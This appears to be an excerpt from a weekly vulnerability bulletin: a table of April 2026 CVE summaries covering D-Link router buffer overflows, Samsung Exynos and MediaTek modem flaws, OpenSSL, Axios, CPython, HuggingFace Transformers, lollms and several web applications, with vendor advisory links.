| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /url_member.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50660 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of multiple parameters in the /url_rule.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request with parameters name, en, ips, u, time, act, rpri, and log. | 2026-04-08 | not yet calculated | CVE-2025-50661 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /url_group.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50662 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /usb_paswd.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50663 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /user_group.asp endpoint. The attacker can exploit this vulnerability by sending a crafted HTTP GET request with parameters name, mem, pri, and attr. | 2026-04-08 | not yet calculated | CVE-2025-50664 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of input parameters in the /web_keyword.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request via the name, en, time, mem_gb2312, and mem_utf8 parameters. | 2026-04-08 | not yet calculated | CVE-2025-50665 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of multiple parameters in the /web_post.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request in parameters such as name, en, user_id, log, and time. | 2026-04-08 | not yet calculated | CVE-2025-50666 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the iface parameter in the /wan_line_detection.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50667 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the s parameter in the /web_list_opt.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50668 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 and DI-8003G 19.12.10A1 due to improper handling of the wan_ping parameter in the /wan_ping.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50669 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /xwgl_bwr.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request in the name, qq, and time parameters. | 2026-04-08 | not yet calculated | CVE-2025-50670 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /xwgl_ref.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request with excessively long strings in parameters name, en, user_id, shibie_name, time, act, log, and rpri. | 2026-04-08 | not yet calculated | CVE-2025-50671 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /yyxz_dlink.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50672 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the http_lanport parameter in the /webgl.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50673 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| Tendacn[.]com -- AC6 WiFi Router | Tenda AC6 15.03.05.16_multi is vulnerable to Buffer Overflow in the formSetCfm function via the funcname, funcpara1, and funcpara2 parameters. | 2026-04-08 | not yet calculated | CVE-2025-52221 | https://github.com/faqiadegege/IoTVuln/blob/main/tendaAc6_formSetCfm_funcname_overflow/detail.md https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | D-Link DI-8003 v16.07.26A1, DI-8500 v16.07.26A1, DI-8003G v17.12.21A1, DI-8200G v17.12.20A1, DI-8200 v16.07.26A1, DI-8400 v16.07.26A1, DI-8004w v16.07.26A1, DI-8100 v16.07.26A1, and DI-8100G v17.12.20A1 were discovered to contain a buffer overflow via the rd_en, rd_auth, rd_acct, http_hadmin, http_hadminpwd, rd_key, and rd_ip parameters in the radius_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-04-08 | not yet calculated | CVE-2025-52222 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow via a certain ioctl message, issue 1 of 2. | 2026-04-07 | not yet calculated | CVE-2025-52908 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52908/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow via a certain ioctl message, issue 2 of 2. | 2026-04-07 | not yet calculated | CVE-2025-52909 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52909/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads to a Denial of Service. | 2026-04-06 | not yet calculated | CVE-2025-54324 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54324/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in SMS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. A Stack-based Buffer Overflow occurs while parsing SMS RP-DATA messages. | 2026-04-06 | not yet calculated | CVE-2025-54328 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54328/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Improper synchronization on a global variable leads to a double free. An attacker can trigger a race condition by invoking an ioctl function concurrently from multiple threads. | 2026-04-06 | not yet calculated | CVE-2025-54601 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54601/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1080, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Improper synchronization on a global variable leads to a use-after-free. An attacker can trigger a race condition by invoking an ioctl function concurrently from multiple threads. | 2026-04-06 | not yet calculated | CVE-2025-54602 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54602/ |
| n/a--GenieACS | In GenieACS 1.2.13, an unauthenticated access vulnerability exists in the NBI API endpoint. | 2026-04-07 | not yet calculated | CVE-2025-56015 | https://github.com/genieacs/genieacs/ https://github.com/e1st/CVE-2025-56015 |
| Apache Software Foundation--Apache Airflow | When a user logged out, the JWT token the user had authenticated with was not invalidated, which could lead to reuse of that token in case it was intercepted. In Airflow 3.2 a mechanism was implemented that invalidates the token at logout. Users who are concerned about the logout scenario and the possibility of intercepted tokens should upgrade to Airflow 3.2+. Users are recommended to upgrade to version 3.2.0, which fixes this issue. | 2026-04-09 | not yet calculated | CVE-2025-57735 | https://github.com/apache/airflow/pull/61339 https://github.com/apache/airflow/pull/56633 https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98 |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem (Exynos 980, 850, 990, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 1680, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400, and Modem 5410). The absence of proper input validation leads to a Denial of Service. | 2026-04-06 | not yet calculated | CVE-2025-57834 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54328/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in RRC in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Improper memory initialization results in an illegal memory access, causing a system crash via a malformed RRCReconfiguration message. | 2026-04-06 | not yet calculated | CVE-2025-57835 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-57835/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect handling of LTE MAC packets containing many MAC Control Elements (CEs) leads to baseband crashes. | 2026-04-06 | not yet calculated | CVE-2025-58349 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-58349/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in USIM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Improper handling of SIM card proactive commands leads to a Denial of Service. | 2026-04-06 | not yet calculated | CVE-2025-59440 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-59440/ |
| n/a--n/a | An open redirect in Ascertia SigningHub User v10.0 allows attackers to redirect users to a malicious site via a crafted URL. | 2026-04-06 | not yet calculated | CVE-2025-61166 | https://linkedin.com/in/thakur-nikhil https://medium.com/@rajput.thakur/malicious-open-redirection-cve-2025-61166-bf5d708cd241 |
| Apache Software Foundation--Apache DolphinScheduler | An Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Apache DolphinScheduler. This vulnerability may allow unauthorized actors to access sensitive information, including database credentials. This issue affects Apache DolphinScheduler versions 3.1.*. Users are recommended to upgrade to version ≥ 3.2.0 if using 3.1.x. As a temporary workaround, users who cannot upgrade immediately may restrict the exposed management endpoints by setting the following environment variable: `MANAGEMENT_ENDPOINTS_WEB_EXPOSURE_INCLUDE=health,metrics,prometheus`. Alternatively, add the following configuration to the application.yaml file: `management: endpoints: web: exposure: include: health,metrics,prometheus`. This issue has been reported as CVE-2023-48796: https://cveprocess.apache.org/cve5/CVE-2023-48796 | 2026-04-09 | not yet calculated | CVE-2025-62188 | https://lists.apache.org/thread/ffrmkcwgr2lcz0f5nnnyswhpn3fytsvo https://www.cve.org/CVERecord?id=CVE-2023-48796 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0. | 2026-04-09 | not yet calculated | CVE-2025-62718 | https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5 https://github.com/axios/axios/pull/10661 https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df https://datatracker.ietf.org/doc/html/rfc1034#section-3.1 https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2 https://github.com/axios/axios/releases/tag/v1.15.0 |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. An out-of-bounds write occurs due to a mismatch between the TP-UDHI and UDL values when processing an SMS TP-UD packet. | 2026-04-07 | not yet calculated | CVE-2025-62818 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-62818/ |
| n/a--LimeSurvey | A Reflected Cross-Site Scripting (XSS) affects LimeSurvey versions prior to 6.15.11+250909, due to the lack of validation of gid parameter in getInstance() function in application/models/QuestionCreate.php. This allows an attacker to craft a malicious URL and compromise the logged in user. | 2026-04-09 | not yet calculated | CVE-2025-63238 | https://github.com/LimeSurvey/LimeSurvey/commit/80769a677dc82ddb1fcced4af19bd959d583208d https://gist.github.com/masquerad3r/f913ab479e8de2ad71987ef98a088fb5 |
| n/a--n/a | An issue in JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to force the infotainment system into accepting falsified GPS signals as legitimate, resulting in the device reporting an incorrect or static location. | 2026-04-07 | not yet calculated | CVE-2025-69515 | http://jxl.com https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main/README.md |
| n/a--n/a | An issue was discovered in Kiamo before 8.4 allowing authenticated administrative attackers to execute arbitrary PHP code on the server. | 2026-04-09 | not yet calculated | CVE-2025-70364 | http://kiamo.com https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md |
| Kiamo[.]com -- Kiamo | A stored cross-site scripting (XSS) vulnerability exists in Kiamo before 8.4 due to improper output encoding of user-supplied input in administrative interfaces. An authenticated administrative user can inject arbitrary JavaScript code that is executed in the browser of users viewing the affected pages. | 2026-04-09 | not yet calculated | CVE-2025-70365 | http://kiamo.com https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70365-Kiamo.md |
| n/a--Limesurvey | Cross Site Scripting vulnerability in Limesurvey v.6.15.20+251021 allows a remote attacker to execute arbitrary code via the Box[title] and box[url] parameters. | 2026-04-09 | not yet calculated | CVE-2025-70797 | https://gist.github.com/masquerad3r/772ddbfbd9fd95754f4873bcb202146d https://github.com/LimeSurvey/LimeSurvey/pull/4356 |
| n/a--n/a | Cross Site Request Forgery vulnerability in Phpbb phpbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the login function and the authentication mechanism. | 2026-04-09 | not yet calculated | CVE-2025-70810 | https://github.com/ariefibis https://www.linkedin.com/in/mohammed-a-6a2548112/ https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30 |
| n/a--n/a | Cross Site Request Forgery vulnerability in Phpbb phpbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the Admin Control Panel icon management functionality. | 2026-04-09 | not yet calculated | CVE-2025-70811 | https://github.com/ariefibis https://www.linkedin.com/in/mohammed-a-6a2548112/ https://github.com/ariefibis/PHPBB/security/advisories/GHSA-56pv-xg3w-6822 |
| n/a--Yaffa | yaffa v2.0.0 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript into the "Add Account Group" function on the account-group page, allowing execution of arbitrary script in the context of users who view the affected page. | 2026-04-07 | not yet calculated | CVE-2025-70844 | https://github.com/kantorge/yaffa https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70844 |
| n/a--n/a | Dual DHCP DNS Server 8.01 improperly accepts and caches UDP DNS responses without validating that the response originates from a legitimate configured upstream DNS server. The implementation matches responses primarily by TXID and inserts results into the cache, enabling a remote attacker to inject forged responses and poison the DNS cache, potentially redirecting victims to attacker-controlled destinations. | 2026-04-07 | not yet calculated | CVE-2025-71058 | https://sourceforge.net/projects/dhcp-dns-server/ https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-71058 |
| Google--Android | In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-04-06 | not yet calculated | CVE-2026-0049 | https://source.android.com/docs/security/bulletin/2026/2026-04-01 |
| Pegasystems--Pega Robot Studio | An arbitrary file-write vulnerability in Pega Browser Extension (PBE) affects Pega Robotic Automation version 22.1 or R25 users who are running automations that work with Google Chrome or Microsoft Edge. A bad actor could create a website that includes malicious code. The vulnerability could occur if a Robot Runtime user navigates to the malicious website. | 2026-04-07 | not yet calculated | CVE-2026-1078 | https://support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remediation-note |
| Pegasystems--Pega Browser Extension (PBE) | A native messaging host vulnerability in Pega Browser Extension (PBE) affects users of all versions of Pega Robotic Automation who have installed Pega Browser Extension. A bad actor could create a website that contains malicious code that targets PBE. The vulnerability could occur if a user navigates to this website. The malicious website could then present an unexpected message box. | 2026-04-07 | not yet calculated | CVE-2026-1079 | https://support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remediation-note |
| parisneo--parisneo/lollms | In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0. | 2026-04-07 | not yet calculated | CVE-2026-1114 | https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89 https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad55fed34 |
| parisneo--parisneo/lollms | A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious JavaScript, which is executed in the browsers of users viewing the Home Feed, including administrators. This can lead to account takeover, session hijacking, and wormable attacks. The issue is resolved in version 2.2.0. | 2026-04-10 | not yet calculated | CVE-2026-1115 | https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a |
| parisneo--parisneo/lollms | A Cross-site Scripting (XSS) vulnerability was identified in the `from_dict` method of the `AppLollmsMessage` class in parisneo/lollms prior to version 2.2.0. The vulnerability arises from the lack of sanitization or HTML encoding of the `content` field when deserializing user-provided data. This allows an attacker to inject malicious HTML or JavaScript payloads, which can be executed in the context of another user's browser. Exploitation of this vulnerability can lead to account takeover, session hijacking, or wormable attacks. | 2026-04-12 | not yet calculated | CVE-2026-1116 | https://huntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a |
| parisneo--parisneo/lollms | An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject requests after a period of inactivity and the excessively long default session duration of 31 days. The vulnerability enables an attacker to maintain persistent access to a compromised account, even after the victim resets their password. | 2026-04-08 | not yet calculated | CVE-2026-1163 | https://huntr.com/bounties/abe2d1c4-c21c-4608-8a8e-274565246a8b |
| Python Software Foundation--CPython | CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host. | 2026-04-10 | not yet calculated | CVE-2026-1502 | https://github.com/python/cpython/pull/146212 https://github.com/python/cpython/issues/146211 https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/ https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69 |
| huggingface--huggingface/transformers | A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3. | 2026-04-07 | not yet calculated | CVE-2026-1839 | https://huntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485 https://github.com/huggingface/transformers/commit/03c8082ba4594c9b8d6fe190ca9bed0e5f8ca396 |
| Unknown--Link Whisper Free | The Link Whisper Free WordPress plugin before 0.9.1 has a publicly accessible REST endpoint that allows unauthenticated settings updates. | 2026-04-07 | not yet calculated | CVE-2026-1900 | https://wpscan.com/vulnerability/dc10b627-7981-4c53-bc9d-e87418f3fcfc/ |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01106496; Issue ID: MSV-4467. | 2026-04-07 | not yet calculated | CVE-2026-20431 | https://corp.mediatek.com/product-security-bulletin/April-2026 |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01406170; Issue ID: MSV-4461. | 2026-04-07 | not yet calculated | CVE-2026-20432 | https://corp.mediatek.com/product-security-bulletin/April-2026 |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01088681; Issue ID: MSV-4460. | 2026-04-07 | not yet calculated | CVE-2026-20433 | https://corp.mediatek.com/product-security-bulletin/April-2026 |
| MediaTek, Inc.--MediaTek chipset | In sec boot, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service, if an attacker has physical access to the device, with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09963054; Issue ID: MSV-3899. | 2026-04-07 | not yet calculated | CVE-2026-20446 | https://corp.mediatek.com/product-security-bulletin/April-2026 |
| Rocket.Chat--Rocket.Chat | An open redirect vulnerability in Rocket.Chat versions prior to 8.4.0 allows users to be redirected to arbitrary URLs by manipulating parameters within a SAML endpoint. | 2026-04-10 | not yet calculated | CVE-2026-22560 | https://hackerone.com/reports/3418031 https://github.com/RocketChat/Rocket.Chat/pull/38994 |
| The Wikimedia Foundation--Mediawiki - Wikilove Extension | Improper neutralization of alternate XSS syntax vulnerability in The Wikimedia Foundation Mediawiki - Wikilove Extension allows Cross-Site Scripting (XSS). The issue has been remediated on the `master` branch, and in the release branches for MediaWiki versions 1.43, 1.44, and 1.45. | 2026-04-07 | not yet calculated | CVE-2026-22711 | https://phabricator.wikimedia.org/T416502 https://gerrit.wikimedia.org/r/q/Iab86209478a044504f5a6aea0d8c3d14f21c48b3 |
| OpenPLC_V3--OpenPLC_V3 | OpenPLC_V3 is vulnerable to an Initialization of a Resource with an Insecure Default vulnerability which could allow an attacker to gain access to the system by bypassing authentication via an API. | 2026-04-09 | not yet calculated | CVE-2026-28205 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10 |
| OpenSSL--OpenSSL | Issue summary: Applications using AES-CFB128 encryption or decryption on systems with AVX-512 and VAES support can trigger an out-of-bounds read of up to 15 bytes when processing partial cipher blocks. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application if the input buffer ends at a memory page boundary and the following page is unmapped. There is no information disclosure as the over-read bytes are not written to output. The vulnerable code path is only reached when processing partial blocks (when a previous call left an incomplete block and the current call provides fewer bytes than needed to complete it). Additionally, the input buffer must be positioned at a page boundary with the following page unmapped. CFB mode is not used in TLS/DTLS protocols, which use CBC, GCM, CCM, or ChaCha20-Poly1305 instead. For these reasons the issue was assessed as Low severity according to our Security Policy. Only x86-64 systems with AVX-512 and VAES instruction support are affected. Other architectures and systems without VAES support use different code paths that are not affected. OpenSSL FIPS module in 3.6 version is affected by this issue. | 2026-04-07 | not yet calculated | CVE-2026-28386 | OpenSSL Advisory 3.6.2 git commit |
| OpenSSL--OpenSSL | Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side. Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0)/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage. By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records. No FIPS modules are affected by this issue, the problem code is outside the FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-28387 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| OpenSSL--OpenSSL | Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed a NULL pointer dereference might happen if the required CRL Number extension is missing. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-28388 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
